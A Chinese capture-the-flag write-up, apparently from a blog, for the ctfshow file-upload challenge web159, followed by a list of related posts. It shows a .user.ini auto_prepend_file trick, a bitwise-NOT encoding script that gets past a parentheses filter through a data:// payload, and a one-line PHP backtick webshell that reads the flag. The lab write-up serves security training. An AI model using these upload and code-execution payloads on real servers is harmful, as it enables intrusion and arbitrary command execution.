---

思路

直接在burp里面改target和host的值,或者在本地发包


成功上传.user.ini

auto_prepend_file=shell.png

相比之前题目的过滤发现()也不能用了,不过可以用取反和异或来绕过

不需要括号的函数

echo
require
include

Y1ng师傅的取反脚本,用data协议来执行代码

<?php
$a = "data://text/plain,<?php system('tac ../f*');?>";
echo "~(";
for ($i = 0; $i < strlen($a); $i++) {echo "%".bin2hex(~$a[$i]);
}
echo ")";
//require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?>

由于post提交参数服务器不能自动url解码,所以要想解码一次再提交

访问upload,拿到flag

---

总结

也可以用
shell.png

<?=`tac ../f*`?>

CTFshow 文件上传 web159相关推荐

1. CTFshow 文件上传 web167

   目录 思路 总结 思路 根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以 ...

2. CTFshow 文件上传 web153

   目录 思路 总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上 ...

3. CTFSHOW文件上传篇

   151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀,内容为一句话 直接访问upload/1.php然后 po ...

4. ctfshow文件上传

   web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了. web152-后端绕过 一模一样的步骤,应该上一题前端判 ...

5. CTFshow 文件上传 web166

   目录 思路 总结 思路 直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip 直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面 在上传的zi ...

6. CTFshow 文件上传 web162

   目录 思路 总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89aauto_prepend_file=png ...

7. CTFshow 文件上传 web156

   目录 思路 总结 思路 这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell. https://github.com/hunter ...

8. CTFshow 文件上传 web154

   目录 思路 总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png ...

9. ctfshow 文件上传 web151~170

   目录 web151 web 152 web 153 web 154 web 155 web 156 web 157~159 web 160 web 161 web 162~163 web 164 we ...

最新文章

1. 2014年新鲜出炉的16款免费英文字体
2. 机房监控系统解说--发电机篇
3. Asp.net 内置对象
4. 学习HTML5之塔克大战（详细记录）
5. InnoDB O_DIRECT选项漫谈（一）【转】
6. QT Creator介绍
7. netty依赖_高性能：《一遍文章带你看懂 Netty世界》
8. 决策树---ID3算法
9. 2019 CCPC-Wannafly Winter Camp Div2 Day1
10. Nacos部署中的一些常见问题汇总
11. Windows环境下多个tomcat启动方法
12. 做好产品的孵化器 淘特上线10元店、淘特100
13. google annotation笔记
14. rsync替换cp命令显示速度和进度
15. vscode插件之常用插件
16. 做一个高德地图的 iOS / Android .NET MAUI 控件系列 - 前言
17. Windows XP 默认蓝色桌面的 RGB
18. 持久化内存+傲腾持久化内存
19. 金蝶KIS专业版单据序时簿看不到的问题
20. Intent中putExtra()方法用法

热门文章

1. C++指针初始化总结
2. 只有程序员才有的十大烦恼
3. Android多线程分析之二：Thread的实现
4. CRS中常用的OCR和Votedisk的操作命令小结
5. 2018技术卓越奖发布 阿里云数据库POLARDB获最佳创新产品奖
6. 【Python爬虫学习笔记6】JSON文件存储
7. 如何提高数据安全性与可用性——行云管家堡垒机
8. 从零开始玩人工智能-人脸 API-03
9. mysql5.5数据库权限知识补充
10. bitmap文件格式分析